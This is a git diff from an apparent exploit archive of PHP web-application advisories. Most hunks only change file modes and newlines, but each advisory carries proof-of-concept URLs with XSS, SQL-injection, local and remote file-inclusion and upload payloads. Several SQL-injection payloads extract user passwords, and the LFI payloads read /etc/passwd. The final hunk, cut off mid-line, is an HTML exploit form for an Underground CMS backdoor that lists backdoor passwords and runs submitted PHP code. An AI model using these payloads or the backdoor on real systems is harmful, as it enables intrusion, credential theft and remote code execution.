b/platforms/php/webapps/30640.txt old mode 100755 new mode 100644 index 1147ca777..9550b1eb4 --- a/platforms/php/webapps/30640.txt +++ b/platforms/php/webapps/30640.txt @@ -5,4 +5,4 @@ Stuffed Tracker is prone to multiple cross-site scripting vulnerabilities becaus An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. http://target/path/admin/campaign_link.html?GenCode=1&CampId=1&SplitId=&GLink=XSS -http://target/PATH/actions.html?CpId=1&SiteId=1&Mode=new&EditId=[XSS] \ No newline at end of file +http://target/PATH/actions.html?CpId=1&SiteId=1&Mode=new&EditId=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30641.txt b/platforms/php/webapps/30641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30642.txt b/platforms/php/webapps/30642.txt old mode 100755 new mode 100644 index 1772252c1..0a7a1ddb1 --- a/platforms/php/webapps/30642.txt +++ b/platforms/php/webapps/30642.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to steal cookie-based authentication creden These issues affect MailBee WebMail Pro 3.4 and prior versions. -http://www.example.com/[PATH]/default.asp?mode=advanced_login&mode2=[XSS] \ No newline at end of file +http://www.example.com/[PATH]/default.asp?mode=advanced_login&mode2=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30647.txt b/platforms/php/webapps/30647.txt old mode 100755 new mode 100644 index 4a2685fbe..10e81e51e --- a/platforms/php/webapps/30647.txt +++ b/platforms/php/webapps/30647.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SNewsCMS 2.1is vulnerable to this issue; other versions may also be affected. -http://www.example.com/news_page.php?page_id=">XSS \ No newline at end of file +http://www.example.com/news_page.php?page_id=">XSS \ No newline at end of file diff --git a/platforms/php/webapps/30651.txt b/platforms/php/webapps/30651.txt old mode 100755 new mode 100644 index 12ebcec49..0383a31b8 --- a/platforms/php/webapps/30651.txt +++ b/platforms/php/webapps/30651.txt @@ -4,4 +4,4 @@ Webmaster-Tips.net Joomla! RSS Feed Reader is prone to a remote file-include vul Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll? \ No newline at end of file +http://www.example.com/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll? \ No newline at end of file diff --git a/platforms/php/webapps/30653.txt b/platforms/php/webapps/30653.txt old mode 100755 new mode 100644 index 6f6a78a69..c80e852e7 --- a/platforms/php/webapps/30653.txt +++ b/platforms/php/webapps/30653.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects phpMyAdmin 2.11.1; other versions may also be vulnerable. -http://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script> \ No newline at end of file +http://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script> \ No newline at end of file diff --git a/platforms/php/webapps/30654.txt b/platforms/php/webapps/30654.txt old mode 100755 new mode 100644 index 9ff96baad..32f837c2d --- a/platforms/php/webapps/30654.txt +++ b/platforms/php/webapps/30654.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects ActiveKB NX 2.6; other versions may also be vulnerable. -http://www.example.com/ActiveKB/page?=XSS \ No newline at end of file +http://www.example.com/ActiveKB/page?=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30655.txt b/platforms/php/webapps/30655.txt old mode 100755 new mode 100644 index 14bfb4e62..add92d981 --- a/platforms/php/webapps/30655.txt +++ b/platforms/php/webapps/30655.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The issue affects Joomla! 1.0.13; other versions may also be vulnerable. -http://www.example.com/index.php?option=com_search&searchword=';alert('XSS') \ No newline at end of file +http://www.example.com/index.php?option=com_search&searchword=';alert('XSS') \ No newline at end of file diff --git a/platforms/php/webapps/30656.txt b/platforms/php/webapps/30656.txt old mode 100755 new mode 100644 index 913bd6178..ebb20d17b --- a/platforms/php/webapps/30656.txt +++ b/platforms/php/webapps/30656.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l boastMachine 2.8 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/index.php?id=../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/index.php?id=../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30657.txt b/platforms/php/webapps/30657.txt old mode 100755 new mode 100644 index bceeb0ff0..09a818312 --- a/platforms/php/webapps/30657.txt +++ b/platforms/php/webapps/30657.txt @@ -4,4 +4,4 @@ UMI CMS is prone to a cross-site scripting vulnerability because the application An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert() \ No newline at end of file +http://www.example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert() \ No newline at end of file diff --git a/platforms/php/webapps/30658.txt b/platforms/php/webapps/30658.txt old mode 100755 new mode 100644 index 8ec616793..c3cebcba4 --- a/platforms/php/webapps/30658.txt +++ b/platforms/php/webapps/30658.txt @@ -5,4 +5,4 @@ CRS Manager is prone to multiple remote file-include vulnerabilities because it Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. http://www.example.com/index.php?DOCUMENT_ROOT=shell?? -http://www.example.com/login.php?DOCUMENT_ROOT=shell?? \ No newline at end of file +http://www.example.com/login.php?DOCUMENT_ROOT=shell?? \ No newline at end of file diff --git a/platforms/php/webapps/30659.txt b/platforms/php/webapps/30659.txt old mode 100755 new mode 100644 index 0e2ca083e..647ae08f7 --- a/platforms/php/webapps/30659.txt +++ b/platforms/php/webapps/30659.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The issue affects Nucleus CMS 3.0.1; other versions may also be vulnerable. -http://www.example.com/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30660.txt b/platforms/php/webapps/30660.txt old mode 100755 new mode 100644 index 1bff5a849..b150ea5bd --- a/platforms/php/webapps/30660.txt +++ b/platforms/php/webapps/30660.txt @@ -5,4 +5,4 @@ Stride 1.0 Courses is prone to multiple SQL-injection vulnerabilities because it Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/detail.php?course=[SQL] -http://www.example.com/detail.php?provider=[SQL] \ No newline at end of file +http://www.example.com/detail.php?provider=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/30662.txt b/platforms/php/webapps/30662.txt old mode 100755 new mode 100644 index 6a452ac65..145c85a91 --- a/platforms/php/webapps/30662.txt +++ b/platforms/php/webapps/30662.txt @@ -4,4 +4,4 @@ Scott Manktelow Design Stride 1.0 Content Management System is prone to an SQL-i Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/main.php?p=[SQL] \ No newline at end of file +http://www.example.com/main.php?p=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/30663.txt b/platforms/php/webapps/30663.txt old mode 100755 new mode 100644 index 78026a7ff..40e1d5cb8 --- a/platforms/php/webapps/30663.txt +++ b/platforms/php/webapps/30663.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and Linkliste 1.2 is reportedly vulnerable to these issues; other versions may also be affected. -http://www.example.com/index.php?styl[top]=shell?? \ No newline at end of file +http://www.example.com/index.php?styl[top]=shell?? \ No newline at end of file diff --git a/platforms/php/webapps/30664.txt b/platforms/php/webapps/30664.txt old mode 100755 new mode 100644 index e65837083..4a4b2a2ec --- a/platforms/php/webapps/30664.txt +++ b/platforms/php/webapps/30664.txt @@ -4,4 +4,4 @@ Scott Manktelow Design Stride 1.0 Merchant is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/shop.php?cmd=sto&id=[SQL] \ No newline at end of file +http://www.example.com/shop.php?cmd=sto&id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/30682.txt b/platforms/php/webapps/30682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30683.txt b/platforms/php/webapps/30683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30684.txt b/platforms/php/webapps/30684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30685.txt b/platforms/php/webapps/30685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30686.txt b/platforms/php/webapps/30686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30689.php b/platforms/php/webapps/30689.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30691.txt b/platforms/php/webapps/30691.txt old mode 100755 new mode 100644 index dc5f945be..cef71cdbf --- a/platforms/php/webapps/30691.txt +++ b/platforms/php/webapps/30691.txt @@ -5,4 +5,4 @@ OmniVista 4760 is prone to multiple cross-site scripting vulnerabilities because Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. http://www.somesite.com/?Langue="><script>alert("xss")</script><" -http://www.somesite.com/php-bin/Webclient.php?action=<script>alert("xss")</script> \ No newline at end of file +http://www.somesite.com/php-bin/Webclient.php?action=<script>alert("xss")</script> \ No newline at end of file diff --git a/platforms/php/webapps/30693.txt b/platforms/php/webapps/30693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30694.txt b/platforms/php/webapps/30694.txt old mode 100755 new mode 100644 index 5b913bfe0..c0413198d --- a/platforms/php/webapps/30694.txt +++ b/platforms/php/webapps/30694.txt @@ -4,4 +4,4 @@ SocketMail is prone to a cross-site scripting vulnerability because the applicat An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/lostpwd.php?lost_id=[XSS] \ No newline at end of file +http://www.example.com/path/lostpwd.php?lost_id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30695.txt b/platforms/php/webapps/30695.txt old mode 100755 new mode 100644 index 86511b1c1..c023a57bf --- a/platforms/php/webapps/30695.txt +++ b/platforms/php/webapps/30695.txt @@ -7,4 +7,4 @@ Exploiting these vulnerabilities may allow an attacker to perform cross-site scr rNote 0.9.7.5 is vulnerable; other versions may also be affected. http://www.example.com/rnote/rnote.php?d=<script>alert("RxH")</script -http://www.example.com/rnote/rnote.php?u=<script>alert("RxH")</script \ No newline at end of file +http://www.example.com/rnote/rnote.php?u=<script>alert("RxH")</script \ No newline at end of file diff --git a/platforms/php/webapps/30697.txt b/platforms/php/webapps/30697.txt old mode 100755 new mode 100644 index e3f278fde..4aeb0d7ab --- a/platforms/php/webapps/30697.txt +++ b/platforms/php/webapps/30697.txt @@ -4,4 +4,4 @@ ReloadCMS is prone to a local file-include vulnerability because it fails to pro Exploiting this issue may allow an unauthorized user to execute local scripts or to view arbitrary files that may contain sensitive information that can aid in further attacks. -http://www.example.com/index.php?module=../../../../etc/passwd \ No newline at end of file +http://www.example.com/index.php?module=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30698.txt b/platforms/php/webapps/30698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30699.txt b/platforms/php/webapps/30699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30700.txt b/platforms/php/webapps/30700.txt old mode 100755 new mode 100644 index 8ada47737..9d68d6052 --- a/platforms/php/webapps/30700.txt +++ b/platforms/php/webapps/30700.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects DMCMS 0.7.0; other versions may also be affected. -http://www.example.com/index.php?page=media&id=[SQL INJECTION CODE GOES HERE] \ No newline at end of file +http://www.example.com/index.php?page=media&id=[SQL INJECTION CODE GOES HERE] \ No newline at end of file diff --git a/platforms/php/webapps/30701.txt b/platforms/php/webapps/30701.txt old mode 100755 new mode 100644 index 9eba0f1c4..25d009a9d --- a/platforms/php/webapps/30701.txt +++ b/platforms/php/webapps/30701.txt @@ -7,4 +7,4 @@ Exploiting this issue may allow an unauthorized user to execute local scripts or This issue affects Jeebles Directory 2.9.60; other versions may also be affected. -http://www.example.com/[path]/download.php?settings2.inc.php \ No newline at end of file +http://www.example.com/[path]/download.php?settings2.inc.php \ No newline at end of file diff --git a/platforms/php/webapps/30703.txt b/platforms/php/webapps/30703.txt old mode 100755 new mode 100644 index 78242f18e..c1108fe8a --- a/platforms/php/webapps/30703.txt +++ b/platforms/php/webapps/30703.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to upload arbitrary code and execute Versions of Japanese PHP Gallery Hosting released prior to 10/2007 are vulnerable. -http://www.example.com/upload/upload.php?ServerPath=http://www.example2.com/malicious.php.arbitraryextension \ No newline at end of file +http://www.example.com/upload/upload.php?ServerPath=http://www.example2.com/malicious.php.arbitraryextension \ No newline at end of file diff --git a/platforms/php/webapps/30707.txt b/platforms/php/webapps/30707.txt old mode 100755 new mode 100644 index b6e0ed152..fb23bb8d1 --- a/platforms/php/webapps/30707.txt +++ b/platforms/php/webapps/30707.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects basicFramework 1.0; other versions may also be vulnerable. -http://www.example.com/includes.php?root=[shell] \ No newline at end of file +http://www.example.com/includes.php?root=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/30712.txt b/platforms/php/webapps/30712.txt old mode 100755 new mode 100644 index c127c17a9..1c8e79a8b --- a/platforms/php/webapps/30712.txt +++ b/platforms/php/webapps/30712.txt @@ -5,4 +5,4 @@ Multi-Forums is prone to multiple SQL-injection vulnerabilities because it fails Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id] -http://www.example.com/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id] \ No newline at end of file +http://www.example.com/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id] \ No newline at end of file diff --git a/platforms/php/webapps/30715.txt b/platforms/php/webapps/30715.txt old mode 100755 new mode 100644 index 25944dcd1..70044f37d --- a/platforms/php/webapps/30715.txt +++ b/platforms/php/webapps/30715.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects WordPress 2.3; other versions may also be vulnerable. -http://www.example.com/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(123);</script> \ No newline at end of file +http://www.example.com/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(123);</script> \ No newline at end of file diff --git a/platforms/php/webapps/30716.txt b/platforms/php/webapps/30716.txt old mode 100755 new mode 100644 index 81bded165..7b512dec9 --- a/platforms/php/webapps/30716.txt +++ b/platforms/php/webapps/30716.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities may allow an attacker to perform cross-site scr http://www.example.com/index.php?page=&email=<Evil-Script> http://www.example.com/index.php?page=home&command=<Evil-Script> -http://www.example.com/index.php?page=home&component=currencies&command=<Evil-Script> http://www.example.com/index.php?page=home&component=basket&command=%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?page=home&component=currencies&command=<Evil-Script> http://www.example.com/index.php?page=home&component=basket&command=%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30717.txt b/platforms/php/webapps/30717.txt old mode 100755 new mode 100644 index 4ca333595..f0d936a61 --- a/platforms/php/webapps/30717.txt +++ b/platforms/php/webapps/30717.txt @@ -5,4 +5,4 @@ Omnistar Live is prone to a cross-site scripting vulnerability because the appli An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. http://www.example.com/smartshop/users/kb.php?id=10002&category_id=XSS -http://www.example.com/users/kb.php?category_id=XSS \ No newline at end of file +http://www.example.com/users/kb.php?category_id=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30718.txt b/platforms/php/webapps/30718.txt old mode 100755 new mode 100644 index 523ca5be3..1e5a2af0f --- a/platforms/php/webapps/30718.txt +++ b/platforms/php/webapps/30718.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Saxon 5.4; earlier versions may also be vulnerable. -http://www.example.com/admin/menu.php?config[news_url]="><script>alert(document.cookies)</script> \ No newline at end of file +http://www.example.com/admin/menu.php?config[news_url]="><script>alert(document.cookies)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30719.txt b/platforms/php/webapps/30719.txt old mode 100755 new mode 100644 index 667f96c0b..9793bc31a --- a/platforms/php/webapps/30719.txt +++ b/platforms/php/webapps/30719.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects Saxon 5.4; earlier versions may also be affected. -http://www.example.com/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23 \ No newline at end of file +http://www.example.com/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23 \ No newline at end of file diff --git a/platforms/php/webapps/30731.txt b/platforms/php/webapps/30731.txt old mode 100755 new mode 100644 index c7a880e48..e826c0223 --- a/platforms/php/webapps/30731.txt +++ b/platforms/php/webapps/30731.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l Synergiser 1.2 RC1 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/index.php?page=../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/index.php?page=../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30732.txt b/platforms/php/webapps/30732.txt old mode 100755 new mode 100644 index 4ab9cdc23..d965ef47f --- a/platforms/php/webapps/30732.txt +++ b/platforms/php/webapps/30732.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to access sensitive information that may lead CONTENTCustomizer 3.1mp is vulnerable; other versions may also be affected. -http://www.example.com/dialog.php?action=editauthor&doc=pagename \ No newline at end of file +http://www.example.com/dialog.php?action=editauthor&doc=pagename \ No newline at end of file diff --git a/platforms/php/webapps/30733.txt b/platforms/php/webapps/30733.txt old mode 100755 new mode 100644 index 838fb2360..0b27f9489 --- a/platforms/php/webapps/30733.txt +++ b/platforms/php/webapps/30733.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects versions prior to phpMyAdmin 2.11.1.2. -http://www.example.com/phpMyAdmin/server_status.php/"><script>alert('xss')</script> \ No newline at end of file +http://www.example.com/phpMyAdmin/server_status.php/"><script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/php/webapps/30734.txt b/platforms/php/webapps/30734.txt old mode 100755 new mode 100644 index 8af99218a..dcca91e79 --- a/platforms/php/webapps/30734.txt +++ b/platforms/php/webapps/30734.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary HTML or script code This issue affects Helios Calendar 1.2.1 Beta; other versions may also be affected. -http://www.example.com/calendar/admin/index.php?msg=1&username=[XSS] \ No newline at end of file +http://www.example.com/calendar/admin/index.php?msg=1&username=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30735.txt b/platforms/php/webapps/30735.txt old mode 100755 new mode 100644 index bac7f8992..8db9107fc --- a/platforms/php/webapps/30735.txt +++ b/platforms/php/webapps/30735.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l PHP Helpdesk 0.6.16 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/index.php?whattodo=../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?whattodo=../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/30737.txt b/platforms/php/webapps/30737.txt old mode 100755 new mode 100644 index 7a3fa1855..37dc99784 --- a/platforms/php/webapps/30737.txt +++ b/platforms/php/webapps/30737.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Galmeta Post 0.2 is vulnerable; other versions may also be affected. -http://www.example.comtmp/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=[shell] \ No newline at end of file +http://www.example.comtmp/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/30738.txt b/platforms/php/webapps/30738.txt old mode 100755 new mode 100644 index 723e7616d..1ba525b14 --- a/platforms/php/webapps/30738.txt +++ b/platforms/php/webapps/30738.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc E-Vendejo 0.2 is vulnerable; other versions may also be affected. -http://www.example.com/articles.php?lingvo=ca&id=10 UNION ALL SELECT null,null,concat(usr_login,0x23,usr_pass),null,null FROM usuaris/* \ No newline at end of file +http://www.example.com/articles.php?lingvo=ca&id=10 UNION ALL SELECT null,null,concat(usr_login,0x23,usr_pass),null,null FROM usuaris/* \ No newline at end of file diff --git a/platforms/php/webapps/30739.txt b/platforms/php/webapps/30739.txt old mode 100755 new mode 100644 index 7e5f16d40..b72958225 --- a/platforms/php/webapps/30739.txt +++ b/platforms/php/webapps/30739.txt @@ -4,4 +4,4 @@ JLMForo System is prone to a cross-site scripting vulnerability because the appl An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/PATH/buscador.php?clave=[XSS] \ No newline at end of file +http://www.example.com/PATH/buscador.php?clave=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30741.txt b/platforms/php/webapps/30741.txt old mode 100755 new mode 100644 index 9f2cb41c3..59082269f --- a/platforms/php/webapps/30741.txt +++ b/platforms/php/webapps/30741.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l easyGB 2.1.1 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/index.php?DatabaseType=[Local File]%00 \ No newline at end of file +http://www.example.com/index.php?DatabaseType=[Local File]%00 \ No newline at end of file diff --git a/platforms/php/webapps/30745.html b/platforms/php/webapps/30745.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30746.txt b/platforms/php/webapps/30746.txt old mode 100755 new mode 100644 index e05c42d37..37d641dc4 --- a/platforms/php/webapps/30746.txt +++ b/platforms/php/webapps/30746.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary HTML or script code We were not told which versions are affected. We will update this BID as more information emerges. -https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 \ No newline at end of file +https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 \ No newline at end of file diff --git a/platforms/php/webapps/30748.txt b/platforms/php/webapps/30748.txt old mode 100755 new mode 100644 index a773707dd..01fad15b1 --- a/platforms/php/webapps/30748.txt +++ b/platforms/php/webapps/30748.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability could permit remote attackers to pass malicious in Xoops 2.0.17.1 is vulnerable; other versions may also be affected. -http://www.example.com.com/modules/mylinks/brokenlink.php?lid=1%20OR%201=2 \ No newline at end of file +http://www.example.com.com/modules/mylinks/brokenlink.php?lid=1%20OR%201=2 \ No newline at end of file diff --git a/platforms/php/webapps/30751.html b/platforms/php/webapps/30751.html old mode 100755 new mode 100644 index 80b90d29f..4a843a6d3 --- a/platforms/php/webapps/30751.html +++ b/platforms/php/webapps/30751.html @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary HTML or script code This issue affects Broadcast Machine 0.9.9.9; other versions may also be affected. -<form action="http://www.example.com/login.php" method="post"><input type="text" name="username" value='"<script>alert(1)</script>'><input type="submit"></form> \ No newline at end of file +<form action="http://www.example.com/login.php" method="post"><input type="text" name="username" value='"<script>alert(1)</script>'><input type="submit"></form> \ No newline at end of file diff --git a/platforms/php/webapps/30754.txt b/platforms/php/webapps/30754.txt old mode 100755 new mode 100644 index ddc3da95c..452e39840 --- a/platforms/php/webapps/30754.txt +++ b/platforms/php/webapps/30754.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow AutoIndex PHP Script 2.2.2 is vulnerable; other versions may also be affected. -http://www.example.com/AutoIndex/index.php/"><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/AutoIndex/index.php/"><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30757.txt b/platforms/php/webapps/30757.txt old mode 100755 new mode 100644 index 61b58991c..a692b5760 --- a/platforms/php/webapps/30757.txt +++ b/platforms/php/webapps/30757.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect X7 Chat 2.0.4; other versions may be also vulnerable. -http://www.example.com/sources/frame.php?room=<script>alert(123);</script> \ No newline at end of file +http://www.example.com/sources/frame.php?room=<script>alert(123);</script> \ No newline at end of file diff --git a/platforms/php/webapps/30758.txt b/platforms/php/webapps/30758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3076.php b/platforms/php/webapps/3076.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30762.txt b/platforms/php/webapps/30762.txt old mode 100755 new mode 100644 index fd93fe4b8..022a4fa78 --- a/platforms/php/webapps/30762.txt +++ b/platforms/php/webapps/30762.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects WP-SlimStat Plugin 0.9.2; other versions may also be vulnerable. -www.example.com/wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=<Script Code> \ No newline at end of file +www.example.com/wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=<Script Code> \ No newline at end of file diff --git a/platforms/php/webapps/30764.txt b/platforms/php/webapps/30764.txt old mode 100755 new mode 100644 index 9dfd1ee8a..6b5218efe --- a/platforms/php/webapps/30764.txt +++ b/platforms/php/webapps/30764.txt @@ -9,4 +9,4 @@ CONTENTCustomizer 3.1mp is vulnerable; other versions may also be affected. http://www.example.com/dialog.php?action=del&doc='+pagename // Delete http://www.example.com/dialog.php?action=delbackup&doc='+pagename // Delete Backup http://www.example.com/dialog.php?action=res&doc='+pagename // Reset -http://www.example.com/dialog.php?action=ren&doc='+pagename // Rename \ No newline at end of file +http://www.example.com/dialog.php?action=ren&doc='+pagename // Rename \ No newline at end of file diff --git a/platforms/php/webapps/30774.txt b/platforms/php/webapps/30774.txt old mode 100755 new mode 100644 index fad700f44..a556cb67b --- a/platforms/php/webapps/30774.txt +++ b/platforms/php/webapps/30774.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Liferay Portal 4.1.0 and 4.1.1 are vulnerable; other versions may also be affected. -http://www.example.com/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http://www.example2.com%22%3C/script%3E%3Ca%20b=%22c \ No newline at end of file +http://www.example.com/c/portal/login?login=%22%3E%3Cscript%3Edocument.fm1.action=%22http://www.example2.com%22%3C/script%3E%3Ca%20b=%22c \ No newline at end of file diff --git a/platforms/php/webapps/30786.txt b/platforms/php/webapps/30786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3079.txt b/platforms/php/webapps/3079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30790.txt b/platforms/php/webapps/30790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30792.html b/platforms/php/webapps/30792.html old mode 100755 new mode 100644 index 93619060d..87190c128 --- a/platforms/php/webapps/30792.html +++ b/platforms/php/webapps/30792.html @@ -8,4 +8,4 @@ Attackers can exploit this issue to gain unauthorized access to the application. Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected. --> -<head> <title>Ucms v. 1.8 Np exploit</title> <script type="text/javascript"> function sethost(seite) { document.host.action = seite + 'index.php?&q=test&e=1'; document.all.data.innerHTML = document.host.action; } </script> </head> <body onLoad="sethost('http://www.example.com/')" > <h1>Ucms v. 1.8 Np exploit</h1> Actual Request:<div id="data"></div> <br /> Host:<input type="text" value="http://www.ucmspage.de/" onKeyUp="sethost(this.value);" /> <form id="host" name="host" action="http://www.ucmspage.de/" method="POST"> Password:<input type="text" name="p" value="ZCShY8FjtEhIF8LZ"><br /> <!-- Additional info: You need a password to activate the backdoor we found these passwords: ZCShY8FjtEhIF8LZ (UCMS 1.8) mYM1NHtWtZk2KwrF (UCMS 1.4) wVCQUyhTga5Nmft1 (UCMS [?]) Just go into the file or similar files to find the passwords, for every version there is another password --> Phpcode:<br /> <textarea name="e" rows="20" cols="100"> phpinfo(); ?> </textarea> <br /> <input type="submit" value="exploit"> </form> </body> <!-- It�s just a crime to do such thigs, so please use this exploit just for knowledge and not to destroy the warez pages... thank you for you attention... Have a nice day --> </html> \ No newline at end of file +<head> <title>Ucms v. 